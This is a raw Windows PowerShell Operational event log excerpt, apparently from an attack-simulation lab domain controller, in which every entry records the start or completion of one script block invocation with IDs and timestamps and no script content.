SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473253
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473252
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473251
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473250
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473249
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473248
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473247
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473246
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473245
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473244
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473243
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473242
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473241
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473240
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473239
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473238
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473237
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473236
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473235
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473234
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473233
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473232
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473231
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473230
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473229
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473228
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473227
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473226
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473225
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473224
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473223
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473222
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473221
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473220
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473219
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473218
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473217
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473216
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473215
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473214
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473213
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473212
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473211
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473210
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473209
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473208
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473207
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473206
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473205
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473204
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473203
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473202
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473201
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1473200
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1473199
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
